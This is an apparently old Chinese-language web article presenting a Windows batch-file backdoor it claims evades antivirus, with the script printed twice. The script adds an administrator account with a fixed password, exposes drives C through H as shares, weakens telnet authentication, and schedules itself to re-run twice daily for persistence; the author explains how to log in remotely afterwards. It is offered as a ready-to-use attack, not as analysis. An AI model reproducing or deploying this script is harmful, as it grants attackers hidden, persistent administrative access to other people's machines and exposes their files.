用批處理寫(xiě)的后門(mén) 永不被殺
更新時(shí)間:2006年09月07日 00:00:00 作者:
代碼思路是影子鷹DESERT朋友的,原代碼比較麻煩,我做了改進(jìn),這個(gè)后門(mén)優(yōu)點(diǎn)就是小而且不會(huì)被殺,放到SYSTEM32目錄下就可以了 ,代碼如下:
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
這樣就會(huì)循環(huán)運(yùn)行我們的程序了,即使被人停下來(lái),過(guò)幾個(gè)小時(shí),又回重新運(yùn)行,呵呵~~
運(yùn)行后TELNET IP上去,用戶名為xyt,密碼為hacker。
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
這樣就會(huì)循環(huán)運(yùn)行我們的程序了,即使被人停下來(lái),過(guò)幾個(gè)小時(shí),又回重新運(yùn)行,呵呵~~
運(yùn)行后TELNET IP上去,用戶名為xyt,密碼為hacker。
相關(guān)文章
windows CMD生成文件夾樹(shù)狀圖tree命令的使用
本文主要介紹了windows CMD生成文件夾樹(shù)狀圖tree命令的使用,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧2022-07-07統(tǒng)計(jì)每個(gè)數(shù)的重復(fù)次數(shù),并按照重復(fù)次數(shù)由高到低排序的批處理
統(tǒng)計(jì)每個(gè)數(shù)的重復(fù)次數(shù),并按照重復(fù)次數(shù)由高到低排序2009-05-05通過(guò)批處理關(guān)閉135 137 445等端口的實(shí)現(xiàn)代碼(勒索病毒)
這篇文章主要介紹了通過(guò)批處理關(guān)閉135 137 445等端口的實(shí)現(xiàn)代碼,需要的朋友可以參考下2018-08-08